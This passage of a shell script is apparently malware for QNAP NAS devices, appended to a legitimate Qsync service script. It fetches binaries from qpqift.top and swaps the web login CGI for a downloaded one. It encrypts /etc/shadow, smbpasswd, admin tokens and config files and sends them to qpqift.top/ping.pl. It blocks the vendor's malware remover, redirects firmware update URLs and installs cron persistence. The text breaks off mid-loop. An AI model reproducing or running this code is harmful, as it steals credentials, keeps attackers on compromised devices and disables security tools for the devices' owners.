_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
chmod 755 ".backup_${file}"
|
||||
if grep "\.backup_${file}" "$file"; then
|
||||
:
|
||||
else
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
echo ". ./.backup_${file}" >> "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
|
||||
fi
|
||||
|
||||
if [ ! -f ".qdisk_cmd" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
|
||||
test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
|
||||
else
|
||||
rm -f '.qdisk_cmd.tmp'
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
binhash=''; rsynchash=''
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
version=$(getcfg System Version)
|
||||
test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
|
||||
test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
|
||||
|
||||
if [ ! -d rssdoc ]; then
|
||||
command -v bunzip2 && compext=bz2 || compext=gz
|
||||
curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
|
||||
rm -f "rssdoc.tar.${compext}"
|
||||
fi
|
||||
|
||||
rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
|
||||
ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
|
||||
|
||||
if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
|
||||
internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
|
||||
localupdateurl="http://127.0.0.1:${internalwebport}"
|
||||
sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
|
||||
|
||||
if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
|
||||
:
|
||||
else
|
||||
cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
fi
|
||||
|
||||
for file in /etc/config/rssdoc/qpkgcenter_*.xml
|
||||
do
|
||||
if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
touch "$file"
|
||||
cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
|
||||
test -d "$qpkgdir" && break
|
||||
done
|
||||
test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
|
||||
test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
|
||||
|
||||
if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
|
||||
for file in 10_derek_3.pyc 12_derek_3.pyc; do
|
||||
if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
|
||||
test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
|
||||
AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
|
||||
a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
|
||||
EOF
|
||||
chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
file=''; qpkgdir=''
|
||||
|
||||
if [ ! -f .rsakey ]; then
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
fi
|
||||
|
||||
cgibindir='/home/httpd/cgi-bin'
|
||||
if [ ! -f "1551848401_c" ] && [ -f "${cgibindir}/authLogin.cgi" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ]; then
|
||||
test -f "1551848401_c" || touch "1551848401_c"
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
|
||||
test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
test -f '.qal' && rm -f '.qal'
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
|
||||
:
|
||||
else
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
|
||||
test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
|
||||
if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
|
||||
sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
|
||||
lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
|
||||
sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
|
||||
kill -2 "$sshpid"
|
||||
fi
|
||||
|
||||
if [ ! -f '1548997200_c' ]; then
|
||||
touch '1548997200_c'
|
||||
mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
|
||||
__BOOT_DEV=
|
||||
__model=`getcfg System "Internal Model"`
|
||||
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
|
||||
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
|
||||
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
|
||||
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
|
||||
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
|
||||
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
|
||||
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
|
||||
|
||||
if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
|
||||
for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
|
||||
if [ -f "$file" ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "$file"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
umount "$mdir"
|
||||
rmdir "$mdir"
|
||||
fi
|
||||
|
||||
if [ ! -f '1553058001_c' ]; then
|
||||
touch '1553058001_c'
|
||||
key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
|
||||
{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/smbpasswd /etc/shadow /etc/config/*.conf /etc/default_config/*.conf /etc/*.conf /etc/config/.*.conf /etc/default_config/.*.conf /etc/.*.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
|
||||
fi
|
||||
|
||||
if [ ! -f 1551848403_c ]; then
|
||||
touch 1551848403_c
|
||||
test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
|
||||
|
||||
if [ ! -z $cronscriptpath ]; then
|
||||
test -d "${bdir}/.system" || mkdir -p "${bdir}/.system"
|
||||
echo '(exec>/dev/null>&1 2>&1;(PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin";openssl base64 -d -A <<"EOF"|sh&' > "${bdir}/.system/.qinstaller.sh"
|
||||
chmod 755 "${bdir}/.system/.qinstaller.sh"
|
||||
{
|
||||
cat <<"XXEOF"
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
sleep 5
|
||||
XXEOF
|
||||
cat <<XXEOF
|
||||
if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
|
||||
set_mutable() {
|
||||
if [ ! -e "\$1" ]; then
|
||||
return 0
|
||||
fi
|
||||
if [ -e /etc/IS_64BITS ]; then
|
||||
# 64bit set mutable
|
||||
SET_M_64="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_64}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80086601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40086602, f); os.close(fd)"
|
||||
else
|
||||
# 32bit set mutable
|
||||
SET_M_32="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_32}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80046601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40046602, f); os.close(fd)"
|
||||
fi
|
||||
}
|
||||
test -f "\${bdir}/.qpkg/${cronscriptpath%/*}" || test -h "\${bdir}/.qpkg/${cronscriptpath%/*}" && { set_mutable "\${bdir}/.qpkg/${cronscriptpath%/*}"; rm -f "\${bdir}/.qpkg/${cronscriptpath%/*}"; }
|
||||
test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
|
||||
test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
|
||||
cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
|
||||
XXEOF
|
||||
cat "${cronscriptpath#*/}"
|
||||
cat <<XXEOF
|
||||
XEOF
|
||||
chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
|
||||
crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
|
||||
trycount=10; trycount=\$(( \$trycount - 10 ))
|
||||
set x \$crontabargs; shift
|
||||
while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
|
||||
trycount=\$(( \$trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
|
||||
test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "\$crontabfile" "\${confdir}/crontab"; do
|
||||
if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
|
||||
cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
|
||||
cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
|
||||
echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
|
||||
crontab "\$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
||||
XXEOF
|
||||
} | { openssl base64 -A; echo; echo 'EOF'; echo ')&)'; } >> "${bdir}/.system/.qinstaller.sh"
|
||||
{ { crontab -l || cat /etc/config/crontab; } | grep -v '^ *#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
|
||||
test ! -z "$line" || continue
|
||||
test -f "$line" || continue
|
||||
test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
|
||||
grep '/\.system/\.qinstaller\.sh"; exit' "$line" && continue
|
||||
head -n 1 "$line" | grep '^#! \?/bin/b\?a\?sh' || continue;
|
||||
tab=' '
|
||||
test "${#tab}" -eq 1 || tab=$(printf '\011') || tab=$(echo -e '\011')
|
||||
sed -i 's!^\([ '"$tab"']\{1,\}\)exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!\1{ '"${bdir}/.system/.qinstaller.sh"'; exit\2; }\3!;s!^exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!{ '"${bdir}/.system/.qinstaller.sh"'; exit\1; }!;s!/.qpkg/.q\{0,1\}installer.sh; exit!/.system/.qinstaller.sh; exit!' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,5p' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
trycnt=20
|
||||
while [ "x$hash" = 'x18ec5ab42dc1231da518951e4479c27b' ] && [ "$trycnt" -gt 0 ]; do
|
||||
trycnt=$(( $trycnt - 1))
|
||||
sed -i '2,5d' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,568{/key=/d;s/\.liveupdate\/liveupdate\.sh//g;s/\.config\/backup_conf\.sh//g;p}' "$line" | md5sum)
|
||||
